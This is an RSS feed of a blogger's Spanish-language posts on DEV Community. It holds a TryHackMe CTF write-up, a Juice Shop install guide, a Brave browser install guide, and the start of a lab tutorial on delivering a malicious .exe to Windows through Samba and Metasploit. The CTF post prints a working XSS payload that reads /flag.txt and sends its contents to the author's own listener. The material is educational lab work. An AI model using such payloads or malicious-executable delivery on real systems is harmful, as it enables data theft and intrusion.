<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: mister_keto</title>
    <description>The latest articles on DEV Community by mister_keto (@mister_keto).</description>
    <link>https://dev.to/mister_keto</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3192610%2F096623fc-a872-4753-ac86-61be5876eda3.png</url>
      <title>DEV Community: mister_keto</title>
      <link>https://dev.to/mister_keto</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mister_keto"/>
    <language>en</language>
    <item>
      <title>Resolucion maquina The Sticker Shop (TryHackMe)</title>
      <dc:creator>mister_keto</dc:creator>
      <pubDate>Sat, 14 Mar 2026 11:03:50 +0000</pubDate>
      <link>https://dev.to/mister_keto/resolucion-maquina-the-sticker-shop-tryhackme-2j8n</link>
      <guid>https://dev.to/mister_keto/resolucion-maquina-the-sticker-shop-tryhackme-2j8n</guid>
      <description>&lt;p&gt;En lo que iba a parecer una maquina sencillita se complica un poco a la larga pero acaba saliendo.&lt;br&gt;
En el objetivo que recibimos nos dan una ip y un puerto que funciona como dominio que da acceso a una flag.txt que opera del lado del servidor.&lt;br&gt;
Accedemos a la ip descargando el archivo vpn de la web y arrancando el tunel.&lt;/p&gt;

&lt;p&gt;OBJETIVO: &lt;a href="http://10.130.136.96:8080/flag.txt" rel="noopener noreferrer"&gt;http://10.130.136.96:8080/flag.txt&lt;/a&gt;&lt;br&gt;
HOST (tun0): 192.168.1.123&lt;/p&gt;

&lt;p&gt;En la web lo único que encuentro son dos apartado, &lt;br&gt;
"Home" y "Feedback", tras el reconocimiento una de ellas será la base de la resolución.&lt;/p&gt;

&lt;p&gt;Tiramos de NMAP a puertos y solo encuentro el 22 y el 8080 con proxy.Hago otro nmap a servicios pero tampoco encuentro nada interesante.&lt;/p&gt;

&lt;p&gt;Tras mirar robots.txt y sitemap.xml no conseguimos nada.&lt;br&gt;
Siguiente objetivo ir al apartado Feedback de la web que es lo único que parece que se le puede inyectar algún script.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdftu6dl3c4b8xl4mhgfm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdftu6dl3c4b8xl4mhgfm.png" alt=" " width="800" height="652"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Me toca tirar de IA porque los scripts de injeccion XSS que utilizo no tienen ningún exito.&lt;br&gt;
Uso el siguiente prompt para que me genere un script de inyección HTML.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;¿Cómo puedo leer el archivo /flag.txt mediante una inyección HTML, de modo que la entrada del administrador se procese y ejecute en el lado del administrador, utilizando GET en lugar de POST y añadiendo los datos de la respuesta a la propia URL? El sitio web es http://10.130.136.96:8080/flag.txt y mi servidor tiene la dirección IP 192.168.129.123?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;La idea es que ese script inyecte del lado del administrador por que tiene el proxy.&lt;/p&gt;

&lt;p&gt;Ahora la idea es ejecutar en mi terminal del host un servidor python, antes del payload, para poder recibir la respuesta del script cuando capture la flag.txt&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcwqcbxdb37g6sx9agcwe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcwqcbxdb37g6sx9agcwe.png" alt=" " width="800" height="57"&gt;&lt;/a&gt;&lt;br&gt;
Ejecuto por el puerto 8085 al ser el puerto que usaré para la redirección de la flag.txt&lt;/p&gt;

&lt;p&gt;Pego el script en el cuadro de dialogo de Feedback.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;script&amp;gt;&lt;/span&gt;
&lt;span class="nf"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;/flag.txt&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;then&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;r&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;text&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
  &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;then&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;t&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nb"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;location&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;href&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;http://192.168.129.123:8085/?&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nf"&gt;encodeURIComponent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2azfl0p09z9kh8qtkam1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2azfl0p09z9kh8qtkam1.png" alt=" " width="800" height="506"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Una vez que lanzo el script en el Feedback, recibiré en mi servidor la respuesta automaticamente con un 200 ok.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F881j98isun2y5jvip51g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F881j98isun2y5jvip51g.png" alt=" " width="800" height="94"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Copio el codigo y lo descodifico en URL a traves de CyberChef.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://toolbox.itsec.tamu.edu/#recipe=URL_Decode()&amp;amp;input=VEhNJTdCODM3ODlhNjkwNzRmNjM2ZjY0YTM4ODc5Y2ZjYWJlOGI2MjMwNWVlNiU3RA
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Le paso el codigo y me da la flag sin codificar.&lt;/p&gt;

&lt;p&gt;THM{83789a69074f636f64a38879cfcabe8b62305ee6}&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Instalar JUICE SHOP (owasp) en Linux</title>
      <dc:creator>mister_keto</dc:creator>
      <pubDate>Sat, 29 Nov 2025 02:02:43 +0000</pubDate>
      <link>https://dev.to/mister_keto/instalar-juice-shop-owasp-en-linux-69h</link>
      <guid>https://dev.to/mister_keto/instalar-juice-shop-owasp-en-linux-69h</guid>
      <description>&lt;p&gt;En mi caso voy a instalarlo en parrot y hacerlo funcionar de manera sencilla con tres simples pasos.&lt;br&gt;
&lt;strong&gt;OWASP Juice Shop&lt;/strong&gt; es un entorno de práctica de ciberseguridad. Piensa en él como un “juego de hacking legal”:&lt;/p&gt;

&lt;p&gt;Es una aplicación web falsa, parecida a una tienda online (de jugos, de ahí el nombre).&lt;/p&gt;

&lt;p&gt;Tiene fallos de seguridad intencionales de todo tipo:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;SQL Injection&lt;/li&gt;
&lt;li&gt;Cross-Site Scripting (XSS)&lt;/li&gt;
&lt;li&gt;Cross-Site Request Forgery (CSRF)&lt;/li&gt;
&lt;li&gt;Autenticación rota&lt;/li&gt;
&lt;li&gt;Exposición de datos sensibles&lt;/li&gt;
&lt;li&gt;Y muchos más&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;En mi caso voy a crear un contenedor en el cual estará instalada la pagina web de Owasp Juiceshop y a la cual podremos atacar sin ningún temor al estar instalada en mi propio equipo (localhost).&lt;/p&gt;

&lt;p&gt;Para instalar el Docker o Contenedor en linux habremos de ser administradores:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo su
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3tglczmt00nx6cdo4fgm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3tglczmt00nx6cdo4fgm.png" alt=" " width="401" height="47"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;seguimos instalando el docker&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;apt install docker.io
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95bxw750xidihc0ta33o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95bxw750xidihc0ta33o.png" alt=" " width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;nos aseguramos que funciona&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker --version
docker ps
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;e instalamos juiceshop y le damos el puerto 3000, que será el puerto por el que accederemos a la web para verla.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker run -d --name juice-shop -p 3000:3000 bkimminich/juice-shop
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;-d → ejecuta en segundo plano&lt;/li&gt;
&lt;li&gt;--name juice-shop → nombre del contenedor&lt;/li&gt;
&lt;li&gt;-p 3000:3000 → expone el puerto 3000 para acceder desde mi navegador&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmmlxtfr3oc82qpi5t215.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmmlxtfr3oc82qpi5t215.png" alt=" " width="800" height="542"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;accedemos vía navegador web. En mi caso Firefox y vemos la famosa web de practicas. Ahí verás la tienda simulada, lista para aprender y practicar conceptos de seguridad de manera ética.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37qletar7wt5uk9jityg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37qletar7wt5uk9jityg.png" alt=" " width="800" height="528"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ale, a trabajar.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>docker</category>
    </item>
    <item>
      <title>Instalación de Brave en Parrot/Kali/Linux</title>
      <dc:creator>mister_keto</dc:creator>
      <pubDate>Mon, 27 Oct 2025 21:54:37 +0000</pubDate>
      <link>https://dev.to/mister_keto/instalacion-de-brave-en-parrotlinux-4kkn</link>
      <guid>https://dev.to/mister_keto/instalacion-de-brave-en-parrotlinux-4kkn</guid>
      <description>&lt;p&gt;Es relativamente sencillo instalar Brave en Linux siguiendo estos pasos todo ello en la consola del SO. &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Actualizamos nuestro sistema operativo.
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Instalamos los paquetes necesarios para que funcione.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Brave requiere curl, apt-transport-https y gnupg para manejar los repositorios:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install apt-transport-https curl gnupg -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Agrega la clave GPG oficial de Brave&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Una clave GPG (del inglés GNU Privacy Guard) es una herramienta criptográfica que se utiliza para firmar, cifrar y verificar información o comunicaciones digitales, garantizando la autenticidad, integridad y confidencialidad de los datos.&lt;br&gt;
Sirve para proteger información mediante criptografía de clave pública y privada.&lt;/p&gt;

&lt;p&gt;¿Cómo funciona una clave GPG?&lt;/p&gt;

&lt;p&gt;Una clave GPG está compuesta por dos partes:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Clave privada → solo la posee el dueño.&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Sirve para firmar o descifrar mensajes.&lt;/li&gt;
&lt;li&gt;Debe mantenerse en secreto.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;Clave pública → puede compartirse libremente.&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Sirve para que otros verifiquen tus firmas o te envíen mensajes cifrados.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;añadimos la clave GPG&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo curl -fsSLo /usr/share/keyrings/brave-browser-archive-keyring.gpg https://brave-browser-apt-release.s3.brave.com/brave-browser-archive-keyring.gpg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Añadimos el repositorio de Brave
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;echo "deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg] https://brave-browser-apt-release.s3.brave.com/ stable main" | sudo tee /etc/apt/sources.list.d/brave-browser-release.list
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Instalamos Brave
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt update
sudo apt install brave-browser -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Ejecutamos Brave de forma gráfica
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;brave-browser
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
    </item>
    <item>
      <title>Controlar maquina windows a traves de ejecutable .exe desde linux</title>
      <dc:creator>mister_keto</dc:creator>
      <pubDate>Tue, 16 Sep 2025 16:13:42 +0000</pubDate>
      <link>https://dev.to/mister_keto/controlar-maquina-windows-a-traves-de-ejecutable-exe-desde-linux-4hm6</link>
      <guid>https://dev.to/mister_keto/controlar-maquina-windows-a-traves-de-ejecutable-exe-desde-linux-4hm6</guid>
      <description>&lt;p&gt;&lt;strong&gt;SERVIDOR SAMBA&lt;/strong&gt;&lt;br&gt;
Lo primero que necesitamos para hacer esta práctica es crear un servidor Samba. En este servidor que creamos en Parrot, que es un linux basado en Debian, compartiremos el archivo ".exe" que acabaremos metiendo en Windows.(ejecutable malicioso)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install samba -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Edito su archivo de configuración .conf y le digo en que carpeta quiero que comparta los archivos el servidor samba. En mi caso usaré la carpeta &lt;strong&gt;Desktop&lt;/strong&gt; que es donde generaré el archivo malicioso. Lo podemos hacer donde queramos pero hemos de saber situarla para no tener problemas luego buscando el archivo.&lt;/p&gt;

&lt;p&gt;Hago una copia de seguridad del archivo para respaldarlo antes de editarlo&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo cp /etc/samba/smb.conf /etc/samba/smb_original.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Y edito el archivo de configuración de Samba.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo nano /etc/samba/smb.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Como comparto la carpeta Desktop dentro de la home del usuario misterk.&lt;br&gt;
Añado las siguientes lineas al archivo de configuración y edito la localización de la carpeta que compartiré con samba.&lt;/p&gt;

&lt;p&gt;Como valid user pongo al usuario con el que accederé a la carpeta desde windows. En mi caso "misterk".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Compartido]
   path = /home/misterk/Desktop
   available = yes
   valid users = misterk
   read only = no
   browsable = yes
   public = yes
   writable = yes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Guardo el archivo y lo cierro.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdzomohtbtr3hkupm3zt3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdzomohtbtr3hkupm3zt3.png" alt=" " width="800" height="575"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Añado una contraseña al usuario misterk.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo smbpasswd -a misterk
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpso37erg4h9ednq1nii6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpso37erg4h9ednq1nii6.png" alt=" " width="490" height="90"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Recargo el servidor samba y compruebo que está en ejecución.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo systemctl reload smbd
sudo systemctl start smbd
sudo systemctl status smbd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fudfixw18qwchdvl9z84z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fudfixw18qwchdvl9z84z.png" alt=" " width="800" height="394"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Miro las ip's de ambas maquinas con el comando ip ad en la terminal de linux y con ipconfig en la terminal powershell o cmd de Windows y&lt;br&gt;
pruebo que ambas maquinas se vean a traves del comando ping, en ambas maquinas:&lt;/p&gt;

&lt;p&gt;EN LINUX&lt;br&gt;
Lanzo comando en la terminal.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ip ad
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nos dará la ip de nuestra máquina.&lt;/p&gt;

&lt;p&gt;EN WINDOWS&lt;br&gt;
Lanzo este comando en PowerShell o en el CMD&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ipconfig
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Averiguamos las direcciones IP de nuestras dos máquinas. La maquina linux y la objetivo (windows) y hacemos ping entre ellas para corroborar que hay comunicación.&lt;/p&gt;

&lt;p&gt;kali: 192.168.1.140&lt;br&gt;
windows 10: 192.168.1.156&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ping 192.168.1.156
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Hacer el ping nos dirá los paquetes que han llegado a su destino y si han llegado todos lo paquetes enviados. Hacemos lo mismo desde windows apuntando a la dirección de Kali "192.168.1.140".&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;POSTGRESQL&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Ejecutamos el servicio &lt;strong&gt;postgresql&lt;/strong&gt;, para no perder los datos de &lt;strong&gt;msfconsole&lt;/strong&gt;. &lt;/p&gt;

&lt;p&gt;Cuando activo esta base de datos (&lt;strong&gt;postgresql&lt;/strong&gt;), puedo guardar:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Resultados de escaneos (ejemplo: &lt;em&gt;nmap integrado en Metasploit&lt;/em&gt;).&lt;/li&gt;
&lt;li&gt;Hosts descubiertos (direcciones IP, puertos abiertos, sistemas  operativos).&lt;/li&gt;
&lt;li&gt;Servicios detectados en cada máquina.&lt;/li&gt;
&lt;li&gt;Credenciales (usuarios/contraseñas) obtenidas en ataques.&lt;/li&gt;
&lt;li&gt;Sesiones y exploits usados.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;En lugar de perder la info al cerrar msfconsole, la base de datos la conserva.&lt;/p&gt;

&lt;p&gt;Arrancamos el servicio antes de meternos a la msfconsole como root para evitar que nos pida contraseñas.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo service postgresql start
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft52rzun020n4ma262tbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft52rzun020n4ma262tbi.png" alt=" " width="800" height="231"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MSFCONSOLE&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;msfconsole&lt;/strong&gt; es la interfaz de línea de comandos principal de **Metasploit **Framework, una herramienta muy poderosa para pruebas de penetración, desarrollo de exploits y análisis de seguridad. Como ya viene preinstalada en Parrot OS, no hace falta que lo instalemos.&lt;/p&gt;

&lt;p&gt;Lo arrancamos directamente.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;msfconsole
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6hvdfp79yt799w9coe7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6hvdfp79yt799w9coe7.png" alt=" " width="800" height="833"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Arrancará la consola de msfconsole y ejecutamos un db_status para corroborar que ha conectado con postgresql&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;db_status
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Si todo está bien nos contestará así. &lt;/p&gt;

